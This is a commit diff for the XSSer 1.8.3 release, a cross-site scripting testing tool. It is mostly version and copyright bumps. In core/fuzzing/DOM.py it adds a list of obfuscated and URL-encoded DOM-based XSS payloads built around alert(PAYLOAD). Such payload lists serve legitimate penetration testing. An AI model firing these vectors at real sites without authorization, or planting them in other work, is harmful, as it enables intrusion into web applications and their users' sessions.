XSSer v1.8[3] - 'The HiV€!' release

Makefile

@@ -4,7 +4,7 @@ PYTHON=`which python`
 DESTDIR=/
 BUILDIR=$(CURDIR)/debian/xsser
 PROJECT=xsser
-VERSION=1.8.2
+VERSION=1.8.3
 
 all:
 	@echo "make source - Create source package"

README.md

@@ -41,14 +41,16 @@ XSSer runs on many platforms. It requires Python (3.x) and the following librari
     - python3-geoip2 - Python geoip2 API for web services and databases - Python 3.x
     - python3-gi - Python 3 bindings for gobject-introspection libraries
     - python3-cairocffi - cffi-based cairo bindings for Python (Python3)
+    - python3-selenium - Python3 bindings for Selenium
+    - firefoxdriver - Firefox WebDriver support
 
 On Debian-based systems (ex: Ubuntu), run: 
 
-    sudo apt-get install python3-pycurl python3-bs4 python3-geoip python3-geoip2 python3-gi python3-cairocffi
+    sudo apt-get install python3-pycurl python3-bs4 python3-geoip python3-geoip2 python3-gi python3-cairocffi python3-selenium firefoxdriver
 
 On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... also run:
 
-    sudo pip3 install pycurl bs4 geoip2 gobject cairocffi
+    sudo pip3 install pycurl bs4 geoip2 gobject cairocffi selenium
 
 ####  Source libs:
 
@@ -59,6 +61,7 @@ On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... als
    * PyGeoIP2: https://pypi.org/project/geoip2/
    * PyGObject: https://pypi.org/project/gobject/
    * PyCairocffi: https://pypi.org/project/cairocffi/
+   * PySelenium: https://pypi.org/project/selenium/
 
 ----------
 
@@ -79,5 +82,11 @@ in the [LICENSE](./docs/LICENSE) file.
 
   ![XSSer](https://xsser.03c8.net/xsser/thehive5.png "XSSer Bypassers")
 
+  ![XSSer](https://xsser.03c8.net/xsser/thehive6.png "XSSer [HTTP GET] [LOCAL] Reverse Exploit")
+
+  ![XSSer](https://xsser.03c8.net/xsser/thehive7.png "XSSer [HTTP POST] [REMOTE] Reverse Exploit")
+
+  ![XSSer](https://xsser.03c8.net/xsser/thehive8.png "XSSer [HTTP DOM] Exploit")
+
   ![XSSer](https://xsser.03c8.net/xsser/zika4.png "XSSer GeoMap")
 

core/__init__.py

@@ -1,7 +1,7 @@
 """
 This file is part of the XSSer project, https://xsser.03c8.net
 
-Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
+Copyright (c) 2010/2020 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free

core/crawler.py

@@ -4,7 +4,7 @@
 """
 This file is part of the XSSer project, https://xsser.03c8.net
 
-Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
+Copyright (c) 2010/2020 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free

core/curlcontrol.py

@@ -4,7 +4,7 @@
 """
 This file is part of the XSSer project, https://xsser.03c8.net
 
-Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
+Copyright (c) 2010/2020 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -495,7 +495,6 @@ def print_options(cls):
                 print("Limit to follow:", cls.fli)
         else:
             print("Delaying:", cls.delay, "seconds")
-
         print("Retries:", cls.retries, "\n")
 
     def answered(self, check):

core/dork.py

@@ -4,7 +4,7 @@
 """
 This file is part of the XSSer project, https://xsser.03c8.net
 
-Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
+Copyright (c) 2010/2020 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free

core/encdec.py

@@ -4,7 +4,7 @@
 """
 This file is part of the XSSer project, https://xsser.03c8.net
 
-Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
+Copyright (c) 2010/2020 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free

core/fuzzing/DOM.py

@@ -4,7 +4,7 @@
 """
 This file is part of the XSSer project, https://xsser.03c8.net
 
-Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
+Copyright (c) 2010/2020 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -24,14 +24,42 @@
 ## Happy Cross Hacking! ;)
 
 DOMvectors = [
-		{ 'payload' : """?notname=PAYLOAD&""",
-		  'browser' : """[Document Object Model Injection]"""},
-		{ 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''',
-		  'browser' : """[Document Object Model Injection]"""},
-		{ 'payload' : """?<script>history.pushState(0,0,'PAYLOAD');</script>""",
-		  'browser' : """[Document Object Model Injection]"""},
-		{ 'payload' : """?name=Y%0d%0a%0d%0aPAYLOAD""",
-		  'browser' : """[Document Object Model Injection]"""}, 
-		{ 'payload' : """?foobar=name=PAYLOAD&""",
-		  'browser' : """[Document Object Model Injection]"""}
+#		{ 'payload' : """?notname=PAYLOAD&""",
+#		  'browser' : """[Document Object Model Injection]"""},
+#		{ 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''',
+#		  'browser' : """[Document Object Model Injection]"""},
+#		{ 'payload' : """?<script>history.pushState(0,0,'PAYLOAD');</script>""",
+#		  'browser' : """[Document Object Model Injection]"""},
+#		{ 'payload' : """?name=Y%0d%0a%0d%0aPAYLOAD""",
+#		  'browser' : """[Document Object Model Injection]"""}, 
+#		{ 'payload' : """?foobar=name=PAYLOAD&""",
+#		  'browser' : """[Document Object Model Injection]"""},
+		{ 'payload':"""Y#<script>alert('PAYLOAD')</script>""",
+		  'browser':"""[Document Object Model Injection]"""},
+        { 'payload':"""Y#<%<!--'%><script>alert(PAYLOAD);</script -->""",
+          'browser':"""[Document Object Model Injection]"""},			
+        { 'payload':"""Y#<script ^__^>alert(PAYLOAD)</script ^__^""",
+          'browser':"""[Document Object Model Injection]"""},
+        { 'payload':'''Y#<script src="data:text/javascript,alert(PAYLOAD)"></script>''',
+          'browser':"""[Document Object Model Injection]"""},
+        { 'payload':"""Y#<script>+-+-1-+-+alert(PAYLOAD)</script>""",
+          'browser':"""[Document Object Model Injection]"""},
+        { 'payload':"""Y#<script x> alert(PAYLOAD) </script 1=2""",
+          'browser':"""[Document Object Model Injection]"""},
+        { 'payload':'''Y#<script>a=eval;b=alert;a(b(/ PAYLOAD/.source));</script>'">''',
+          'browser':"""[Document Object Model Injection]"""},
+        { 'payload':'''Y#<script/y~~~>;alert(PAYLOAD);</script/Y~~~>''',
+          'browser':"""[Document Object Model Injection]"""},
+        { 'payload':'''Y#%00“><script>alert(PAYLOAD)</script>''',
+          'browser':"""[Document Object Model Injection]"""},
+        { 'payload':'''Y#%22%3E%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''',
+          'browser':"""[Document Object Model Injection]"""},
+        { 'payload':'''Y#%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''',
+          'browser':"""[Document Object Model Injection]"""},
+        { 'payload':'''Y#`"><%3Cscript>javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Document Object Model Injection]"""},
+        { 'payload':'''Y#%3Cscript>javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Document Object Model Injection]"""},
+        { 'payload':"""Y#<SCRIPT>a=/PAYLOAD/alert(a.source)</SCRIPT>""",
+          'browser':"""[Document Object Model Injection]"""}
 		]

core/globalmap.py

@@ -4,7 +4,7 @@
 """
 This file is part of the XSSer project, https://xsser.03c8.net
 
-Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
+Copyright (c) 2010/2020 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free

core/gtkcontroller.py

@@ -4,7 +4,7 @@
 """
 This file is part of the XSSer project, https://xsser.03c8.net
 
-Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
+Copyright (c) 2010/2020 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -352,7 +352,7 @@ def on_quit(self, widget, data=None):
         Callback called when the window is destroyed (close button clicked)
         """
         if self._flying:
-            print("[Info] Exiting... please wait until all mosquitoes return to mothership!\n")
+            print("[Info] Please wait... until all the mosquitoes have returned to the hieve... -> [Exiting!]\n")
             self._quitting = True
             self.on_stop_attack()
             self.do_quit()
@@ -387,7 +387,6 @@ def update_counters_label(self):
             work_count = ""
             crawled = "X"
         pars = [crawled, rem, th_count, work_count]
-
         gdk.threads_enter()
         self.counters_label.set_text(" ".join(pars))
         if pars[3]:

core/imagexss.py

@@ -4,7 +4,7 @@
 """
 This file is part of the XSSer project, https://xsser.03c8.net
 
-Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
+Copyright (c) 2010/2020 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free